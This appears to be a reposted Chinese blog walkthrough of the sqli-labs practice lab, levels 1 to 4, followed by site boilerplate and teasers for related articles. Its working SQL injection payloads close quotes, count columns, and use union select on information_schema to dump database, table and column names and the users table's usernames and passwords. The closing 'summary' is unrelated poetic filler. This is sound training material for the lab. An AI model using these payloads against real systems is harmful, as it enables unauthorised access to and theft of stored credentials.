Background-1 基础知识 sqli-Labs Less1-Less-4

这篇具有很好参考价值的文章主要介绍了Background-1 基础知识 sqli-Labs Less1-Less-4。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、Less-1

http://sqli:8080/Less-1/?id=1

在第一关我们可以尝试增加一个单引号进行尝试

http://sqli:8080/Less-1/?id=1'

错误显示如下:
Background-1 基础知识 sqli-Labs Less1-Less-4

 near ''1'' LIMIT 0,1' at line 1

推测语法的结构


select *from where ***  id='  'id' limit 0,1'

上述错误中我们可以推测由于增加了1’导致语法变成'1'' limit 0,1,是由于多加了一个'造成的后果。
下面是尝试解决的方法
尝试' or 1=1--+把但单引号给闭合
此时的语句构成如下代码段:

selecr ***from  **  where id= '1' or 1=1--+ ' limit 0,1

接下来:
通过order by 来查看有几列数据,当尝试到 order by 4时出现报错猜测只有三列数据。

Background-1 基础知识 sqli-Labs Less1-Less-4为什么造成sql注入分析,由于对单引号闭合后,使用了 or 1=1永真

接下来:采用联合union 把两个多个sql语句连接起来。

http://sqli:8080/Less-1/?id=-1' union select 1,2--+

(当id=-1时,前一个内容为空从而执行后面的语句),从而构造了union语句
下面进行爆数据库:

select 1,2,group_concat(schema_name) from information_schema.schemata--+;

Background-1 基础知识 sqli-Labs Less1-Less-4
爆security的表:

-1'union select 1,2,group_concat( table_name) from information_schema.tables where 
table_schema='security'--+

Background-1 基础知识 sqli-Labs Less1-Less-4
爆users表中的列

-1'union select 1,2,group_concat(column_name) from information_schema.columns where 
table_name='users'--+

Background-1 基础知识 sqli-Labs Less1-Less-4

爆数据

?id=-1'union select 1,username,password from users where id=1--+

Background-1 基础知识 sqli-Labs Less1-Less-4

二、Less-2

Background-1 基础知识 sqli-Labs Less1-Less-4
根据报错信息推测开发者使用的语句是:

select *from table where=(使用的是整数)--+

可成功注入的有:

or 1=1--+
or 1=1--+

三、Less-3

Background-1 基础知识 sqli-Labs Less1-Less-4根据报错信息提示开发者使用的语句是:

select * from table where id=('out input here')--+

可成功注入的有:

 ') or '1'=('1
 ') or 1=1--+

四、Less-4

Background-1 基础知识 sqli-Labs Less1-Less-4
根据报错信息我们推测sql的语句:

select * from table where=("$id")--+

可成功注入的有:

") or "1"=("1
") or 1=1--+

总结

离别总是不经意间,还没来得及告别就已不见,不舍的心情难以言表,相见与分离是现实却如梦,我已傻傻分不清二者。
逍遥游;尧让天下于许由,肩吾问于连叔曰,送人资章甫而适,惠子问庄子曰文章来源地址https://www.toymoban.com/news/detail-481527.html

到了这里,关于Background-1 基础知识 sqli-Labs Less1-Less-4的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Sqli-Labs 通关笔记

    创建网站时选择php版本为5.x 修改./sql-connections/db-creds.inc 修改数据库用户名和密码,下面的数据库名不用管 任务目标:获取表名 Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) sql查询语句为 SELECT * FROM users WHERE id=\\\'$id\\\' LIMIT 0,1 输入 ?id=-1\\\' ,报错语句为

    2023年04月20日
    浏览(30)
  • sqli-labs通关详解

    找注入点,当输入id=1 and 1=2–+时没有变化,尝试单引号闭合找到注入类型 字符型注入,单引号闭合 判断字段数 找回显点 发现有两个回显点 开始信息收集(注意union前后格式要相同) 开始逐级爆破 爆破数据库 看源码或者尝试,没有闭合方式,说明为数字型注入 尝试找到注入

    2023年04月15日
    浏览(36)
  • sqli-labs靶场分析

    1、level1 单引号测试报错,为单引号闭合,且显示1多了个单引号故而为字符型注入。且未对用户输入进行任何过滤。 且SQL语句错误会输出,可以使用报错注入 order by判断表列数 uoion 联合查询,因为网页只显示第一张表的数据,因此需要union前的语句为假,查出数据为空,把位

    2024年02月07日
    浏览(38)
  • SQLI-labs-第一关

    目录 知识点:单引号字符型注入 1、根据提示,为get注入,在url中输入内容​编辑  2、判断注入点  3、判断目前该表的字段数  4、判断回显位置 5、爆库名 6、爆表名   7、爆字段名  8、爆值 知识点:单引号字符型注入 思路: 1、根据提示,为get注入,在url中输入内容  

    2024年02月11日
    浏览(35)
  • sqli-labs部分关思路

    目录 updatexml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 25a 26 26a 27 27a 28 28a 问题:你了解sql注入吗 答:由于程序过滤不严谨,用户异常输入,这些输入会导致数据库异常查询,最终导致sql注入 mysql三种注释符: --+ # /**/ updatexml() 这个函数作用是替换数据,三个参数对应

    2024年02月09日
    浏览(36)
  • sqli-labs关卡之一(两种做法)

    目录 一、布尔盲注(bool注入)  二、时间盲注(sleep注入) 页面没有报错和回显信息,只会返回正常或者不正常的信息,这时候就可以用布尔盲注 布尔盲注原理是先将你查询结果的第一个字符转换为ascii码,再与后面的数字比较,如果为真,整个查询条件就为真,返回正常的结果

    2024年02月09日
    浏览(102)
  • 安装sqli-labs时,mysql 8 报错解决

    首先执行命令Setup/reset Database for labs时,mysqlsql时报错: SETTING UP THE DATABASE SCHEMA AND POPULATING DATA IN TABLES: Warning : mysql_connect(): Server sent charset (255) unknown to the client. Please, report to the developers in  D:developnetworkSecurityphpStudyPHPTutorialWWWsqli-labssql-connectionssetup-db.php  on line  29 Warn

    2024年02月09日
    浏览(23)
  • 【史上最全sqlmap通关sqli-labs靶场教程】

    下载sqlmap地址:sqlmap: automatic SQL injection and database takeover tool 下载完成后解压在C盘或者D盘都行,自己别忘了就可以 解压后在目标文件夹下打开cmd,运行python sqlmap.py -h 运行后出现sqlmap的说明,表示安装成功 ( 这里补充一下,-h其实不是完成的说明,-hh可以获得更多说明, )

    2024年01月19日
    浏览(31)
  • [网络安全]sqli-labs Less-24 解题详析

    本关考察二次排序注入 二次排序注入原理如下:当注册一个名为admin’#的用户后,再对其修改密码,SQL语句如下: 相当于: 从而以 admin\\\'# 为跳板,修改了管理员密码 操作如下: 注册admin’# 密码11 接着登录后修改密码为123 可以看到管理员密码已被修改: 接着我们就可以使

    2024年02月07日
    浏览(36)
  • 基于Sqli-Labs靶场的SQL注入-17~22关

            首先我们进入这一关:         可以看到这一关让你进行“密码重置”,我们这里首先随便输入一个账户和密码进行测试。我这里用户名输入1,密码输入1。观察页面回显:         可以看到页面回显对我们很不友好,对于一个搞网安的,这能忍?         我们进

    2024年02月07日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包